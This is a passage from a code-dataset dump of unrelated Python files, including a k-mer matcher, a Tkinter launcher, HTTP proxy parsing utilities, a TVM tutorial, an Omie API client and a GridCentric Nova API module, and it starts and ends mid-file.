do_crop_responses = not self.crop\n gabor = lambda real, gen: utils.calc_gabor_fhd(real, gen, do_crop_responses, self.img_size, self.crop_size,\n use_custom=self.custom_gabor).item()\n\n fhds = [gabor(real, gen) for (real, gen) in zip(real_response.cpu(), gen_response.cpu())]\n\n return {'ssim': ssims, 'pc': pear_coeffs, 'fhd': fhds}\n\n def test_epoch_end(self, outputs):\n ssim = torch.cat([output[\"ssim\"] for output in outputs]).flatten().tolist()\n pc = torch.cat([output[\"pc\"] for output in outputs]).flatten().tolist()\n fhd = np.array(list(itertools.chain(*[output[\"fhd\"] for output in outputs]))).flatten().tolist()\n\n return {'FHD': fhd, 'PC': pc, 'SSIM': ssim}\n\n def configure_optimizers(self):\n optimizer = torch.optim.Adam(self.generator.parameters(), self.hparams.gen_lr,\n (self.hparams.gen_beta1, self.hparams.gen_beta2))\n return optimizer\n","sub_path":"non_linear/Generator.py","file_name":"Generator.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"433314386","text":"#!/usr/bin/env python3\n\n# Author: Margaret R. Starostik\n\n# Run with: ./day3-homework_kmer_matcher.py subset.fa droYak2_seq.fa 11 | head -1000 > day3-homework_kmer_matcher.txt\n\n\"\"\"\nUsage: day3-homework_kmer_matcher.py \n\nUses the fasta module to parse FASTA files.\nGenerates a dictionary of query sequences:query sequence.\nGoes through target sequence to find matching kmers between the target sequence and dictionary of query kmers.\nReturns target sequence name, target start, query start, and kmer\n\"\"\"\n\nimport sys\nimport fasta # this is the module we made to parse a FASTA file\n\ntarget_reader = fasta.FASTAReader(open(sys.argv[1]))\nquery_reader = fasta.FASTAReader(open(sys.argv[2]))\nkmer_length = int(sys.argv[3])\n\n# Generate a dictionary with query kmers and their start positions\nkmers = {}\n\nfor ident, sequence in query_reader:\n #print(ident, sequence)\n for i in range(0, len(sequence) - kmer_length):\n kmer = sequence[i:i+kmer_length]\n kmers[kmer] = i\n\n# Find matching kmers between a single query sequence and a database of targets. \nfor ident, sequence in target_reader:\n for i in range(0, len(sequence) - kmer_length):\n chunk = sequence[i:i+kmer_length]\n if chunk in kmers:\n print(ident, i, kmers[chunk], chunk)","sub_path":"day3-homework/day3-homework_kmer_matcher.py","file_name":"day3-homework_kmer_matcher.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"585771458","text":"import sys\n\ntry:\n import autogator\nexcept:\n print('USAGE: python -m autogator (did you forget \"-m\"?)')\n sys.exit()\n\nprint(\"Welcome to AutoGator, the automatic chip interrogator.\")\nprint(\"(C) 2019 by Sequoia Ploeg\")\n\nimport tkinter as tk\nimport autogator.images\nimport PIL.ImageTk\n\nclass Splash(tk.Toplevel):\n def __init__(self, parent):\n tk.Toplevel.__init__(self, parent)\n self.title(\"Splash\")\n self.overrideredirect(True)\n self.geometry(\"400x300\")\n self.update_idletasks()\n width = self.winfo_width()\n height = self.winfo_height()\n x = (self.winfo_screenwidth() // 2) - (width // 2)\n y = (self.winfo_screenheight() // 2) - (height // 2)\n self.geometry('{}x{}+{}+{}'.format(width, height, x, y))\n\n maxsize = (400, 300)\n img_holder = tk.Canvas(self, width=400, height=250)\n img_holder.pack(fill=\"both\", expand=True)\n self.img = autogator.images.get_image_by_name('croc.jpg')\n self.img.thumbnail(maxsize)\n self.img = PIL.ImageTk.PhotoImage(self.img)\n img_holder.create_image(0, 0, image=self.img, anchor=tk.NW)\n\n lbl = tk.Label(self, text='AutoGator')\n lbl.pack(fill='both', expand=True)\n\n ## required to make window show before the program gets to the mainloop\n self.update()\n\nclass App(tk.Tk):\n def __init__(self):\n tk.Tk.__init__(self)\n self.withdraw()\n splash = Splash(self)\n\n # Setup stuff goes here\n import os\n import time\n from autogator.ui.program import AutoGatorWindow\n\n # Add location of the DLLs to PATH so that the program can run on any machine\n dll_location = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'dll')\n os.environ['PATH'] = dll_location + os.pathsep + os.environ['PATH']\n\n window = AutoGatorWindow(self)\n self.state('zoomed')\n self.update_idletasks()\n \n # We have finished loading, so destroy splash and show window again\n splash.destroy()\n self.deiconify()\n # window.center()\n\nif __name__ == '__main__':\n app = App()\n app.mainloop()","sub_path":"autogator/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"51428900","text":"def intersection(arrays):\n \"\"\"\n YOUR CODE HERE\n \"\"\"\n # Your code here\n\n cache = {}\n intersections = []\n\n for array in arrays:\n for value in array:\n # if value in cache and not in results add tvalue\n if value in cache and value not in intersections:\n intersections.append(value)\n else:\n cache[value] = True\n print(intersections)\n \n return intersections\n\n\nif __name__ == \"__main__\":\n arrays = []\n\n arrays.append(list(range(1000000, 2000000)) + [1, 2, 3])\n arrays.append(list(range(2000000, 3000000)) + [1, 2, 3])\n arrays.append(list(range(3000000, 4000000)) + [1, 2, 3])\n\n print(intersection(arrays))\n","sub_path":"hashtables/ex3/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"516022878","text":"import math\nclass Solution:\n def countPrimeSetBits(self, L, R):\n \"\"\"\n :type L: int\n :type R: int\n :rtype: int\n \"\"\"\n cnt = 0\n primenum = [2, 3, 5, 7, 11, 13, 17,19]\n for i in range(L, R + 1):\n n = self.countBits(i)\n if n in primenum:\n cnt+=1\n return cnt\n def isPrime(self, n):\n if n < 2:\n return False\n if n == 2 or n == 3:\n return True\n for i in range(2, int(math.sqrt(n)+1)):\n if n%i == 0:\n return False\n return True\n def countBits(self, n):\n return bin(n).count('1')\n\n\nres = Solution()\nl = res.countPrimeSetBits(6,10)\nprint(l)","sub_path":"Python/762-1.py","file_name":"762-1.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"326041477","text":"import random\nimport pickle\nimport os\nfrom urllib.parse import unquote, quote\nimport re\n\n\nclass Coder:\n\tdef __init__(self):\n\t\tself.encode_list = [i for i in range(256)]\n\t\trandom.shuffle(self.encode_list)\n\t\tself.decode_list = [0] * 256\n\t\tfor i in range(len(self.encode_list)):\n\t\t\tself.decode_list[self.encode_list[i]] = i\n\n\tdef encode(self, data: bytes): # 接受加密前的二进制\n\t\ts = bytearray()\n\t\tfor i in data:\n\t\t\ts.append(self.encode_list[i])\n\t\treturn s\n\n\tdef decode(self, data: bytearray): # 接受加密后的二进制\n\t\ts = bytearray()\n\t\tfor i in data:\n\t\t\ts.append(self.decode_list[i])\n\t\treturn str(s, encoding='utf-8')\n\n\tdef decode_as_bytes(self, data: bytearray):\n\t\ts = bytearray()\n\t\tfor i in data:\n\t\t\ts.append(self.decode_list[i])\n\t\treturn s\n\n\tdef save_coder(self):\n\t\tf = open('coder.pkl', 'wb+')\n\t\tpickle.dump(self, f)\n\t\tf.close()\n\n\ndef load_coder():\n\tif not os.path.exists('coder.pkl'):\n\t\tassert False, 'coder not exists'\n\tf = open('coder.pkl', 'rb')\n\t_ = pickle.load(f)\n\tf.close()\n\treturn _\n\n\nclass Request:\n\tdef __init__(self, header):\n\t\tself.content = header\n\t\tself.port = -1\n\t\t_ = True\n\t\tif header:\n\t\t\tindexssl = header.split(b\"\\n\")[0].find(b\"CONNECT\")\n\t\t\tif indexssl > -1:\n\t\t\t\thostname = str(header.split(b\"\\n\")[0].split(b\":\")[0].decode())\n\t\t\t\thostname = hostname[indexssl + 8:]\n\t\t\t\tport = 443\n\t\t\t\tssl_flag = True\n\t\t\t\tself.header = header\n\t\t\t\tself.host = hostname\n\t\t\t\tself.port = port\n\t\t\t\tself.ssl_flag = ssl_flag\n\t\t\tindex1 = header.find(b\"Host:\")\n\t\t\tindex2 = header.find(b\"GET http\")\n\t\t\tindex3 = header.find(b\"POST http\")\n\t\t\tif index1 > -1:\n\t\t\t\tindexofn = header.find(b\"\\n\", index1)\n\t\t\t\thost = header[index1 + 5:indexofn]\n\t\t\telif index2 > -1 or index3 > -1:\n\t\t\t\thost = header.split(b\"/\")[2]\n\t\t\telse:\n\t\t\t\t_ = False\n\t\t\tif _:\n\t\t\t\thost = str(host.decode().strip(\"\\r\").lstrip())\n\t\t\t\tif len(host.split(\":\")) == 2:\n\t\t\t\t\tport = host.split(\":\")[1]\n\t\t\t\t\thostname = host.split(\":\")[0].strip(\"\")\n\t\t\t\telse:\n\t\t\t\t\tport = 80\n\t\t\t\t\thostname = host.split(\":\")[0].strip(\"\")\n\t\t\t\tssl_flag = False\n\t\t\t\tself.header = header\n\t\t\t\tself.host = hostname\n\t\t\t\tself.port = int(port)\n\t\t\t\tself.ssl_flag = ssl_flag\n\n\nclass Response:\n\tdef __init__(self, _response_str: bytes):\n\t\tself.string = _response_str\n\t\tself.dict = {}\n\t\tself.len = -1\n\t\tself.code = -1\n\t\tself.parse()\n\t\tpass\n\n\t@property\n\tdef content_length(self):\n\t\tif 'Content-Length' in self.string:\n\t\t\treturn\n\t\tpass\n\n\tdef status_code(self, _str):\n\t\t_str = _str.decode()\n\t\t_list = re.split(' ', _str)\n\t\tif len(_list) > 1:\n\t\t\tself.code = _list[1]\n\n\tdef parse(self):\n\t\t_idx = self.string.find(b'Content-Type:')\n\t\t_str = self.string[:_idx]\n\t\tself.status_code(_str)\n\t\t_str = _str.decode()\n\t\t_line_list = re.split('\\r\\n', _str)\n\t\tfor i in _line_list:\n\t\t\tif len(i) >= len('Content-Length:'):\n\t\t\t\tif 'Content-Length:' in i:\n\t\t\t\t\tcontent_length_str_list = re.split(' ', i)\n\t\t\t\t\tif content_length_str_list[-1].isdigit():\n\t\t\t\t\t\t_len = int(content_length_str_list[-1])\n\t\t\t\t\t\tself.len = _len\n\t\treturn\n\n\tdef is_end(self):\n\t\tif self.code in ['304'] and len(self.string) >= 4 and self.string[-4:] == b'\\r\\n\\r\\n':\n\t\t\treturn True\n\t\tif self.len != -1:\n\t\t\tbody_bytes = re.split(b'\\r\\n\\r\\n', self.string)[-1]\n\t\t\tif len(body_bytes) == self.len:\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\tif b'\\r\\n0\\r\\n\\r\\n' in self.string:\n\t\t\treturn True\n\t\tif b'0\\r\\n\\r\\n' in self.string:\n\t\t\treturn True\n\t\tif b'' in self.string:\n\t\t\treturn True\n\t\tif b'Transfer-Encoding' in self.string:\n\t\t\tpass\n\t\treturn False\n\n\nif __name__ == '__main__':\n\trequest = 'GET http://chawdoe.coding.me/http_server/record.html HTTP/1.1\\r\\nHost: clients1.google.com:443\\r\\nProxy-Connection: keep-alive\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\\r\\n\\r\\n'\n\t# r2 = 'GET http://chawdoe.coding.me:80/http_server/record.html HTTP/1.1\\r\\n'\n\ttry:\n\t\t_ = Request(request)\n\t\tprint(_.method)\n\t\tprint(_.body)\n\t\tprint(_.headers)\n\n\t\t# print(_.path)\n\t\tprint('path:{}'.format(_.path))\n\t# print(_.request)\n\texcept TypeError:\n\t\tpass\n","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":3992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"210579032","text":"# -*-coding:utf-8-*-\nimport tvm\nimport numpy as np\nfrom tvm.contrib import cblas\n\nn = 1024\nl = 128\nm = 235\n# var\nbias = tvm.var('bias', dtype=tvm.float32)\n# Tensor\nA = tvm.placeholder((n, l), name='A')\nB = tvm.placeholder((l, m), name='B')\n# 添加一个额外的函数,这个函数更多可以是自定义的\n# Tensor\n# C = tvm.extern((n, m), [A, B],\n# lambda ins, outs: tvm.call_packed('tvm.contrib.cblas.matmul',\n# ins[0], ins[1], outs[0], False, False),\n# name='C')\n# # Tensor\n# D = tvm.compute(C.shape, lambda i, j: C[i, j] + bias, name='D')\n# s = tvm.create_schedule(D.op)\n\n# 另外一种写法\nC = cblas.matmul(A, B)\nD = tvm.compute(C.shape, lambda i, j: C[i, j] + bias, name='D')\ns = tvm.create_schedule(D.op)\n\n# verify the result\nctx = tvm.cpu(0)\n# Module\nf = tvm.build(s, [A, B, D, bias], 'llvm')\n# 为什么不行\n# f = tvm.build(s, [A, B, bias,D], 'llvm')\na = tvm.nd.array(np.random.uniform(size=(n, l)).astype(A.dtype), ctx=ctx)\nb = tvm.nd.array(np.random.uniform(size=(l, m)).astype(B.dtype), ctx=ctx)\nd = tvm.nd.array(np.zeros(shape=(n, m), dtype=D.dtype), ctx=ctx)\nbb = 10.0\nf(a, b, d, bb)\nnp.testing.assert_allclose(\n d.asnumpy(), np.dot(a.asnumpy(), b.asnumpy()) + 10, rtol=1e-5)\nprint(d.shape)\n\n\n@tvm.register_func('tvm.contrib.my_tvm_add_one')\ndef my_tvm_add_one(x, y):\n print('my tvm add one signatures :%s, %s' % (type(x), type(y)))\n tvm.nd.array(x.asnumpy() + 1).copyto(y)\n\n\nA = tvm.placeholder((n,), name='A')\nB = tvm.extern(A.shape, [A],\n lambda ins, outs:\n tvm.call_packed('tvm.contrib.my_tvm_add_one', ins[0], outs[0]),\n name='C')\ns = tvm.create_schedule(B.op)\nf = tvm.build(s, [A, B], 'llvm')\na = tvm.nd.array(np.random.uniform(size=(n,)).astype(A.dtype), ctx=ctx)\nb = tvm.nd.array(np.random.uniform(size=(n,)).astype(B.dtype), ctx=ctx)\nf(a, b)\nnp.testing.assert_allclose(b.asnumpy(), a.asnumpy() + 1, rtol=1e-5)\nprint(b.shape)\n","sub_path":"tvm_handson/tutorial/external_tensor_function.py","file_name":"external_tensor_function.py","file_ext":"py","file_size_in_byte":1988,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"625094672","text":"# This class collects and reports error messages\n\nfrom datetime import datetime\nfrom Config import *\nfrom DBPRunFilesS3 import *\n\nclass Log:\n\n\tFATAL = 0\n\tEROR = 1\n\tWARN = 2\n\tINFO = 3\n\tloggers = {}\n\n\tdef getLogger(filesetId):\n\t\tlogger = Log.loggers.get(filesetId)\n\t\tif logger == None:\n\t\t\tlogger = Log(filesetId)\n\t\t\tLog.loggers[filesetId] = logger\n\t\treturn logger\n\n\tdef fatalError(message):\n\t\tlogger = Log.getLogger(\"~\")\n\t\tlogger.message(Log.FATAL, message)\n\t\tconfig = Config()\n\t\tLog.writeLog(config)\n\t\tsys.exit()\n\n\tdef totalErrorCount():\n\t\tcount = 0\n\t\tfor logger in Log.loggers.values():\n\t\t\tcount += logger.errorCount()\n\t\treturn count\n\n\tdef writeLog(config):\n\t\terrors = []\n\t\tfor key in sorted(Log.loggers.keys()):\n\t\t\tlogger = Log.loggers[key]\n\t\t\tfor message in logger.format():\n\t\t\t\terrors.append(message)\n\n\t\tif len(errors) > 0:\n\t\t\terrorDir = config.directory_errors\n\t\t\tpattern = config.filename_datetime \n\t\t\tpath = errorDir + \"Errors.out\"\n\t\t\tprint(\"openErrorReport\", path)\n\t\t\terrorFile = open(path, \"a\", encoding=\"utf-8\")\n\t\t\tfor message in errors:\n\t\t\t\terrorFile.write(message + '\\n')\n\t\t\t\tprint(message, end='\\n')\n\t\t\terrorFile.close()\n\t\t\tDBPRunFilesS3.uploadFile(config, path)\n\t\tprint(\"Num Errors \", len(errors))\n\n\n\tdef addPreValidationErrors(messages):\n\t\tfor (filesetId, errors) in messages.items():\n\t\t\tlogger = Log.getLogger(filesetId)\n\t\t\tfor error in errors:\n\t\t\t\tlogger.messages.append((Log.EROR, error))\t\n\n\n\tdef __init__(self, filesetId):\n\t\tself.filesetId = filesetId\n\t\tself.messages = []\n\n#\tdef hasMessages(self):\n#\t\treturn len(self.messages) > 0\n\n\tdef errorCount(self):\n\t\tcount = 0;\n\t\tfor msg in self.messages:\n\t\t\tif msg[0] == Log.EROR or msg[0] == Log.FATAL:\n\t\t\t\tcount += 1\n\t\treturn count\n\n\tdef message(self, level, text):\n\t\tself.messages.append((level, text))\n\n\tdef messageTuple(self, messageTuple):\n\t\tself.messages.append(messageTuple)\n\n\tdef invalidFileExt(self, filename):\n\t\tself.messages.append((Log.EROR, \"/%s has an invalid file ext.\" % (filename)))\n\n\tdef missingBibleIds(self):\n\t\tself.messages.append((Log.EROR, \"bibleId is not in LPTS.\"))\n\n\tdef missingFilesetIds(self):\n\t\tself.messages.append((Log.EROR, \"filesetId is not in LPTS record.\"))\n\n\tdef damIdStatus(self, stockNo, status):\n\t\tself.messages.append((Log.WARN, \"LPTS %s has status = %s.\" % (stockNo, status)))\n\n\tdef requiredFields(self, stockNo, fieldName):\n\t\tself.messages.append((Log.EROR, \"LPTS %s field %s is required.\" % (stockNo, fieldName)))\n\n\tdef suggestedFields(self, stockNo, fieldName):\n\t\tself.messages.append((Log.WARN, \"LPTS %s field %s is missing.\" % (stockNo, fieldName)))\n\n\tdef invalidValues(self, stockNo, fieldName, fieldValue):\n\t\tself.messages.append((Log.EROR, \"in %s %s has invalid value '%s'.\" % (stockNo, fieldName, fieldValue)))\n\n\tdef fileErrors(self, fileList):\n\t\tfor file in fileList:\n\t\t\tif len(file.errors) > 0:\n\t\t\t\tself.messages.append((Log.EROR, \"%s/%s %s.\" % (self.filesetId, file.file, \", \".join(file.errors))))\n\n\tdef format(self):\n\t\tlevelMap = { Log.FATAL: \"FATAL\", Log.EROR: \"EROR\", Log.WARN: \"WARN\", Log.INFO: \"INFO\"}\n\t\toutput = []\n\t\tfor (level, msg) in self.messages:\n\t\t\tlevelMsg = levelMap.get(level)\n\t\t\toutput.append(\"%s %s %s\" % (levelMsg, self.filesetId, msg))\n\t\treturn output\n\n\nif (__name__ == '__main__'):\n\tconfig = Config()\n\terror = Log.getLogger(\"ENGESVN2DA\")\n\terror.message(Log.INFO, \"First message\")\n\terror.messageTuple((Log.WARN, \"Second message\"))\n\terror.invalidFileExt(\"MyFilename\")\n\terror.missingBibleIds()\n\terror.missingFilesetIds()\n\terror.requiredFields(\"aStockNo\", \"aFieldName\")\n\terror.suggestedFields(\"aStockNo\", \"aFieldName\")\n\terror.invalidValues(\"afieldName\", \"aFieldValue\")\n\tLog.writeLog(config)\n\n","sub_path":"load/Log.py","file_name":"Log.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"221266391","text":"import json\n\nimport requests\n\n\nclass ApiOmie:\n def __init__(self, app_key, app_secret):\n self.APP_KEY = app_key\n self.APP_SECRET = app_secret\n\n def request(self, url, call, params=None):\n if params is None:\n params = {}\n data = {\n 'app_key': self.APP_KEY,\n 'app_secret': self.APP_SECRET,\n 'call': call,\n 'param': [params]\n }\n\n header = {\n 'Content-type': \"application/json\"\n }\n\n r = requests.post(\n url=url,\n data=json.dumps(data),\n headers=header\n )\n\n return r\n\n def calc_retencao(self, j: json):\n total = 0\n if \"retem_ir\" in j:\n if j[\"retem_ir\"] == \"S\":\n total += j[\"valor_ir\"]\n if \"retem_cofins\" in j:\n if j[\"retem_cofins\"] == \"S\":\n total += j[\"valor_cofins\"]\n if \"retem_inss\" in j:\n if j[\"retem_inss\"] == \"S\":\n total += j[\"valor_inss\"]\n if \"retem_csll\" in j:\n if j[\"retem_csll\"] == \"S\":\n total += j[\"valor_csll\"]\n if \"retem_iss\" in j:\n if j[\"retem_iss\"] == \"S\":\n total += j[\"valor_iss\"]\n if \"retem_pis\" in j:\n if j[\"retem_pis\"] == \"S\":\n total += j[\"valor_pis\"]\n return total\n","sub_path":"OmieAPI/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"629180834","text":"# Copyright 2011 GridCentric Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\n\"\"\"Handles all requests relating to GridCentric functionality.\"\"\"\nimport random\n\nfrom nova import compute\nfrom nova.compute import task_states\nfrom nova.compute import vm_states\nfrom nova import exception\nfrom nova.db import base\nfrom nova import quota\nfrom nova.openstack.common import log as logging\nfrom nova.openstack.common import rpc\nfrom nova import utils\nfrom oslo.config import cfg\n\nLOG = logging.getLogger('nova.gridcentric.api')\nCONF = cfg.CONF\n\ngridcentric_api_opts = [\n cfg.StrOpt('gridcentric_topic',\n default='gridcentric',\n help='the topic gridcentric nodes listen on') ]\nCONF.register_opts(gridcentric_api_opts)\n\nclass API(base.Base):\n \"\"\"API for interacting with the gridcentric manager.\"\"\"\n\n def __init__(self, **kwargs):\n super(API, self).__init__(**kwargs)\n self.compute_api = compute.API()\n\n def get(self, context, instance_uuid):\n \"\"\"Get a single instance with the given instance_uuid.\"\"\"\n rv = self.db.instance_get_by_uuid(context, instance_uuid)\n return dict(rv.iteritems())\n\n def _cast_gridcentric_message(self, method, context, instance_uuid, host=None,\n params=None):\n \"\"\"Generic handler for RPC casts to gridcentric. This does not block for a response.\n\n :param params: Optional dictionary of arguments to be passed to the\n gridcentric worker\n\n :returns: None\n \"\"\"\n\n if not params:\n params = {}\n if not host:\n instance = self.get(context, instance_uuid)\n host = instance['host']\n if not host:\n queue = CONF.gridcentric_topic\n else:\n queue = rpc.queue_get_for(context, CONF.gridcentric_topic, host)\n\n params['instance_uuid'] = instance_uuid\n kwargs = {'method': method, 'args': params}\n rpc.cast(context, queue, kwargs)\n\n def _acquire_addition_reservation(self, context, instance):\n # Check the quota to see if we can launch a new instance.\n instance_type = instance['instance_type']\n\n # check against metadata\n metadata = self.db.instance_metadata_get(context, instance['uuid'])\n self.compute_api._check_metadata_properties_quota(context, metadata)\n # Grab a reservation for a single instance\n max_count, reservations = self.compute_api._check_num_instances_quota(context,\n instance_type,\n 1,\n 1)\n return reservations\n\n def _acquire_subtraction_reservation(self, context, instance):\n return quota.QUOTAS.reserve(context, instances= -1, ram= -instance['memory_mb'],\n cores= -instance['vcpus'])\n\n def _commit_reservation(self, context, reservations):\n quota.QUOTAS.commit(context, reservations)\n\n def _rollback_reservation(self, context, reservations):\n quota.QUOTAS.rollback(context, reservations)\n\n def _copy_instance(self, context, instance_uuid, new_name, launch=False, new_user_data=None, security_groups=None):\n # (dscannell): Basically we want to copy all of the information from\n # instance with id=instance_uuid into a new instance. This is because we\n # are basically \"cloning\" the vm as far as all the properties are\n # concerned.\n\n instance_ref = self.db.instance_get_by_uuid(context, instance_uuid)\n image_ref = instance_ref.get('image_ref', '')\n if image_ref == '':\n image_ref = instance_ref.get('image_id', '')\n\n if launch:\n metadata = {'launched_from':'%s' % (instance_ref['uuid'])}\n else:\n metadata = {'blessed_from':'%s' % (instance_ref['uuid'])}\n\n instance = {\n 'reservation_id': utils.generate_uid('r'),\n 'image_ref': image_ref,\n 'vm_state': vm_states.BUILDING,\n 'state_description': 'halted',\n 'user_id': context.user_id,\n 'project_id': context.project_id,\n 'launch_time': '',\n 'instance_type_id': instance_ref['instance_type_id'],\n 'memory_mb': instance_ref['memory_mb'],\n 'vcpus': instance_ref['vcpus'],\n 'root_gb': instance_ref['root_gb'],\n 'ephemeral_gb': instance_ref['ephemeral_gb'],\n 'display_name': new_name,\n 'hostname': utils.sanitize_hostname(new_name),\n 'display_description': instance_ref['display_description'],\n 'user_data': new_user_data or '',\n 'key_name': instance_ref.get('key_name', ''),\n 'key_data': instance_ref.get('key_data', ''),\n 'locked': False,\n 'metadata': metadata,\n 'availability_zone': instance_ref['availability_zone'],\n 'os_type': instance_ref['os_type'],\n 'host': None,\n }\n new_instance_ref = self.db.instance_create(context, instance)\n\n # (dscannell) We need to reload the instance_ref in order for it to be associated with\n # the database session of lazy-loading.\n new_instance_ref = self.db.instance_get(context, new_instance_ref.id)\n\n elevated = context.elevated()\n if security_groups == None:\n security_groups = self.db.security_group_get_by_instance(context, instance_ref['id'])\n for security_group in security_groups:\n self.db.instance_add_security_group(elevated,\n new_instance_ref['uuid'],\n security_group['id'])\n\n return new_instance_ref\n\n def _instance_metadata(self, context, instance_uuid):\n \"\"\" Looks up and returns the instance metadata \"\"\"\n\n return self.db.instance_metadata_get(context, instance_uuid)\n\n def _instance_metadata_update(self, context, instance_uuid, metadata):\n \"\"\" Updates the instance metadata \"\"\"\n\n return self.db.instance_metadata_update(context, instance_uuid, metadata, True)\n\n def _next_clone_num(self, context, instance_uuid):\n \"\"\" Returns the next clone number for the instance_uuid \"\"\"\n\n metadata = self._instance_metadata(context, instance_uuid)\n clone_num = int(metadata.get('last_clone_num', -1)) + 1\n metadata['last_clone_num'] = clone_num\n self._instance_metadata_update(context, instance_uuid, metadata)\n\n LOG.debug(_(\"Instance %s has new clone num=%s\"), instance_uuid, clone_num)\n return clone_num\n\n def _is_instance_blessed(self, context, instance_uuid):\n \"\"\" Returns True if this instance is blessed, False otherwise. \"\"\"\n metadata = self._instance_metadata(context, instance_uuid)\n return 'blessed_from' in metadata\n\n def _is_instance_launched(self, context, instance_uuid):\n \"\"\" Returns True if this instance is launched, False otherwise \"\"\"\n metadata = self._instance_metadata(context, instance_uuid)\n return \"launched_from\" in metadata\n\n def _list_gridcentric_hosts(self, context):\n \"\"\" Returns a list of all the hosts known to openstack running the gridcentric service. \"\"\"\n admin_context = context.elevated()\n services = self.db.service_get_all_by_topic(admin_context, CONF.gridcentric_topic)\n hosts = []\n for srv in services:\n if srv['host'] not in hosts:\n hosts.append(srv['host'])\n return hosts\n\n def bless_instance(self, context, instance_uuid):\n # Setup the DB representation for the new VM.\n instance = self.get(context, instance_uuid)\n\n is_blessed = self._is_instance_blessed(context, instance_uuid)\n is_launched = self._is_instance_launched(context, instance_uuid)\n if is_blessed:\n # The instance is already blessed. We can't rebless it.\n raise exception.NovaException(_((\"Instance %s is already blessed. \" +\n \"Cannot rebless an instance.\") % instance_uuid))\n elif is_launched:\n # The instance is a launched one. We cannot bless launched instances.\n raise exception.NovaException(_((\"Instance %s has been launched. \" +\n \"Cannot bless a launched instance.\") % instance_uuid))\n elif instance['vm_state'] != vm_states.ACTIVE:\n # The instance is not active. We cannot bless a non-active instance.\n raise exception.NovaException(_((\"Instance %s is not active. \" +\n \"Cannot bless a non-active instance.\") % instance_uuid))\n\n reservations = self._acquire_addition_reservation(context, instance)\n try:\n clonenum = self._next_clone_num(context, instance_uuid)\n new_instance = self._copy_instance(context, instance_uuid,\n \"%s-%s\" % (instance['display_name'], str(clonenum)), launch=False)\n\n LOG.debug(_(\"Casting gridcentric message for bless_instance\") % locals())\n self._cast_gridcentric_message('bless_instance', context, new_instance['uuid'],\n host=instance['host'])\n self._commit_reservation(context, reservations)\n except:\n self._rollback_reservation(context, reservations)\n raise\n\n # We reload the instance because the manager may have change its state (most likely it\n # did).\n return self.get(context, new_instance['uuid'])\n\n def discard_instance(self, context, instance_uuid):\n LOG.debug(_(\"Casting gridcentric message for discard_instance\") % locals())\n\n instance = self.get(context, instance_uuid)\n if not self._is_instance_blessed(context, instance_uuid):\n # The instance is not blessed. We can't discard it.\n raise exception.NovaException(_((\"Instance %s is not blessed. \" +\n \"Cannot discard an non-blessed instance.\") % instance_uuid))\n elif len(self.list_launched_instances(context, instance_uuid)) > 0:\n # There are still launched instances based off of this one.\n raise exception.NovaException(_((\"Instance %s still has launched instances. \" +\n \"Cannot discard an instance with remaining launched ones.\") %\n instance_uuid))\n\n old, updated = self.db.instance_update_and_get_original(context, instance_uuid,\n {'task_state':task_states.DELETING})\n reservations = None\n if old['task_state'] != task_states.DELETING:\n # To avoid double counting if discard is called twice, we check if the instance\n # was already being discarded. If it was not, then we need to handle the quotas,\n # otherwise we can skip it.\n reservations = self._acquire_subtraction_reservation(context, instance)\n try:\n self._cast_gridcentric_message('discard_instance', context, instance_uuid)\n self._commit_reservation(context, reservations)\n except:\n self._rollback_reservation(context, reservations)\n raise\n\n def launch_instance(self, context, instance_uuid, params={}):\n pid = context.project_id\n uid = context.user_id\n\n instance = self.get(context, instance_uuid)\n if not(self._is_instance_blessed(context, instance_uuid)):\n # The instance is not blessed. We can't launch new instances from it.\n raise exception.NovaException(\n _((\"Instance %s is not blessed. \" +\n \"Please bless the instance before launching from it.\") % instance_uuid))\n\n # Set up security groups to be added - we are passed in names, but need ID's\n security_group_names = params.pop('security_groups', None)\n if security_group_names != None:\n security_groups = [self.db.security_group_get_by_name(context,\n context.project_id, sg) for sg in security_group_names]\n else:\n security_groups = None\n\n reservations = self._acquire_addition_reservation(context, instance)\n try:\n # Create a new launched instance.\n new_instance_ref = self._copy_instance(context, instance_uuid,\n params.get('name', \"%s-%s\" % (instance['display_name'], \"clone\")),\n launch=True, new_user_data=params.pop('user_data', None),\n security_groups=security_groups)\n\n\n LOG.debug(_(\"Casting to scheduler for %(pid)s/%(uid)s's\"\n \" instance %(instance_uuid)s\") % locals())\n\n # FIXME: The Folsom scheduler removed support for calling\n # arbitrary functions via the scheduler. Damn. So now we\n # have to make scheduling decisions internally. Until this\n # is sorted, we will simply cast the message and let a random\n # host pick it up. Note that this is simply a stopgap measure.\n rpc.cast(context,\n CONF.gridcentric_topic,\n {\"method\": \"launch_instance\",\n \"args\": 